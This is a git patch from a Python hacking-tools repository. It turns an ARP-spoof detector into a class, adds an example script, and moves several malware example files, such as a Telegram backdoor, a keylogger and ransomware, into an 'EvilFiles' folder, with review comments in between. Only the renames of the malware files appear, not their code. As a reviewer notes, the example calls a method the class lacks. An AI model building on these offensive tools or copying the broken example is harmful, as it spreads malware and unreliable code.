From: Dhrumil Mistry <56185972+dmdhrumilmistry@users.noreply.github.com> Date: Mon, 13 Jun 2022 22:48:31 +0530 Subject: [PATCH 5/5] create class for ARP spoof Detector refactor examples into folders --- examples/Detectors/ARP-SpoofDetector.py | 13 +++ .../Malwares/TelegramBackdoor.py | 0 .../Malwares/TelegramDataHarvester.py | 0 .../{ => EvilFiles}/Malwares/key_logger.py | 0 .../Malwares/wifi-password-harvester.py | 0 .../Ransomwares/dmsec_decrypter.py | 0 .../Ransomwares/dmsec_encrypter.py | 0 .../{ => EvilFiles}/Worms/DirClonerWorm.py | 0 pyhtools/detectors/arp_spoof_detector.py | 88 +++++++++---------- 9 files changed, 57 insertions(+), 44 deletions(-) create mode 100644 examples/Detectors/ARP-SpoofDetector.py rename examples/{ => EvilFiles}/Malwares/TelegramBackdoor.py (100%) rename examples/{ => EvilFiles}/Malwares/TelegramDataHarvester.py (100%) rename examples/{ => EvilFiles}/Malwares/key_logger.py (100%) rename examples/{ => EvilFiles}/Malwares/wifi-password-harvester.py (100%) rename examples/{ => EvilFiles}/Ransomwares/dmsec_decrypter.py (100%) rename examples/{ => EvilFiles}/Ransomwares/dmsec_encrypter.py (100%) rename examples/{ => EvilFiles}/Worms/DirClonerWorm.py (100%) diff --git a/examples/Detectors/ARP-SpoofDetector.py b/examples/Detectors/ARP-SpoofDetector.py new file mode 100644 index 0000000..2acd221 --- /dev/null +++ b/examples/Detectors/ARP-SpoofDetector.py @@ -0,0 +1,13 @@ +from argparse import ArgumentParser +from pyhtools.detectors.arp_spoof_detector import SpoofDetector + +parser = ArgumentParser() +parser.add_argument('-i', '--interface', dest='interface', + help='checks for specific interface') + +args = parser.parse_args() +interface = args.interface + +# Create spoof detector obj +detector = SpoofDetector(interface) +detector.capture_packets() 
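Review bot: The example calls `detector.capture_packets()`, but the `SpoofDetector` class introduced in this same commit (pyhtools/detectors/arp_spoof_detector.py) exposes `start()` and defines no `capture_packets` method, so running the example raises AttributeError; the last line should be `detector.start()`, matching the detector module's own `__main__` block. The `-i` option is not `required`, so when it is omitted `interface` is None and is passed straight to `sp.sniff(iface=None, ...)`; if sniffing on the default interface is intended, say so in the `--interface` help text, otherwise add `required=True`.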
diff --git a/examples/Malwares/TelegramBackdoor.py b/examples/EvilFiles/Malwares/TelegramBackdoor.py similarity index 100% rename from examples/Malwares/TelegramBackdoor.py rename to examples/EvilFiles/Malwares/TelegramBackdoor.py diff --git a/examples/Malwares/TelegramDataHarvester.py b/examples/EvilFiles/Malwares/TelegramDataHarvester.py similarity index 100% rename from examples/Malwares/TelegramDataHarvester.py rename to examples/EvilFiles/Malwares/TelegramDataHarvester.py diff --git a/examples/Malwares/key_logger.py b/examples/EvilFiles/Malwares/key_logger.py similarity index 100% rename from examples/Malwares/key_logger.py rename to examples/EvilFiles/Malwares/key_logger.py diff --git a/examples/Malwares/wifi-password-harvester.py b/examples/EvilFiles/Malwares/wifi-password-harvester.py similarity index 100% rename from examples/Malwares/wifi-password-harvester.py rename to examples/EvilFiles/Malwares/wifi-password-harvester.py diff --git a/examples/Ransomwares/dmsec_decrypter.py b/examples/EvilFiles/Ransomwares/dmsec_decrypter.py similarity index 100% rename from examples/Ransomwares/dmsec_decrypter.py rename to examples/EvilFiles/Ransomwares/dmsec_decrypter.py diff --git a/examples/Ransomwares/dmsec_encrypter.py b/examples/EvilFiles/Ransomwares/dmsec_encrypter.py similarity index 100% rename from examples/Ransomwares/dmsec_encrypter.py rename to examples/EvilFiles/Ransomwares/dmsec_encrypter.py diff --git a/examples/Worms/DirClonerWorm.py b/examples/EvilFiles/Worms/DirClonerWorm.py similarity index 100% rename from examples/Worms/DirClonerWorm.py rename to examples/EvilFiles/Worms/DirClonerWorm.py diff --git a/pyhtools/detectors/arp_spoof_detector.py b/pyhtools/detectors/arp_spoof_detector.py index ae0c94b..211596c 100644 --- a/pyhtools/detectors/arp_spoof_detector.py +++ b/pyhtools/detectors/arp_spoof_detector.py 
@@ -1,56 +1,56 @@ -#!usr/bin/env python3 -import argparse import scapy.all as sp +from argparse import ArgumentParser -def get_args(): + +class SpoofDetector: ''' - get arguments if any + ARP spoofer to perform Local MITM attacks ''' - parser = argparse.ArgumentParser() - parser.add_argument('-i', '--interface', dest='interface', help='checks for specific interface') - - args = parser.parse_args() - interface = args.interface - del parser - del args - - return interface + def __init__(self, interface: str) -> None: + self.interface = interface -def get_mac(ip:str): - ''' - returns mac address of the ip - ''' - arp_req = sp.ARP(pdst=ip) - brdcst = sp.Ether(dst='ff:ff:ff:ff:ff:ff') + def get_mac(self, ip: str): + ''' + returns mac address of the ip + ''' + arp_req = sp.ARP(pdst=ip) + brdcst = sp.Ether(dst='ff:ff:ff:ff:ff:ff') - packet = brdcst / arp_req - responded_list = sp.srp(packet, timeout = 1, verbose = False)[0] + packet = brdcst / arp_req + responded_list = sp.srp(packet, timeout=1, verbose=False)[0] - return responded_list[0][1].hwsrc + return responded_list[0][1].hwsrc + def check_spoof(self, packet) -> bool: + ''' + checks if machine is under ARP/MITM attack. + ''' + if packet.haslayer(sp.ARP) and packet[sp.ARP].op == 2: + try: + real_mac = self.get_mac(packet[sp.ARP].psrc) + response_mac = packet[sp.ARP].hwsrc + if real_mac != response_mac: + print( + f"[!] ARP Spoof Detected! {response_mac} is imposter. {response_mac} is spoofing as {real_mac}") + except IndexError: + pass + + def start(self): + ''' + captures and processes packets to check whether network is being attacked or not + ''' + sp.sniff(iface=self.interface, store=False, prn=self.check_spoof) -def check_spoof(packet)->bool: - ''' - checks if machine is under ARP/MITM attack. - ''' - - if packet.haslayer(sp.ARP) and packet[sp.ARP].op == 2: - try: - real_mac = get_mac(packet[sp.ARP].psrc) - response_mac = packet[sp.ARP].hwsrc - if real_mac != response_mac: - print(f"[!] ARP Spoof Detected! 
{response_mac} is imposter. {response_mac} is spoofing as {real_mac}") - except IndexError: - pass - - -def capture_packets(iface:str): - ''' - captures and processes captured packets. - ''' - sp.sniff(iface=iface, store=False, prn=check_spoof) +if __name__ == '__main__': + parser = ArgumentParser() + parser.add_argument('-i', '--interface', dest='interface', + help='checks for specific interface') + + args = parser.parse_args() + interface = args.interface -INTERFACE = get_args() -capture_packets(INTERFACE) \ No newline at end of file + # Create spoof detector obj and start process + detector = SpoofDetector(interface) + detector.start()
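Review bot: The class docstring reads `ARP spoofer to perform Local MITM attacks`, which describes the attacker tool rather than this detector; replace it with `'''Passive ARP-spoof detector: for every ARP reply seen on the interface, resolves the claimed sender IP with its own ARP request and reports a mismatch between the resolved MAC and the MAC in the reply.'''`. `check_spoof` is annotated `-> bool` but never returns a value; either return `True` from the mismatch branch and `False` otherwise, or change the annotation to `-> None`. The alert message prints `response_mac` twice — `{response_mac} is spoofing as {real_mac}` reads better as `{response_mac} is claiming {packet[sp.ARP].psrc}, whose real MAC is {real_mac}`. Note that `get_mac` sends a fresh ARP request for every reply observed, which may make the detector itself noticeable on a busy network; a per-IP cache would be worth a comment or a TODO.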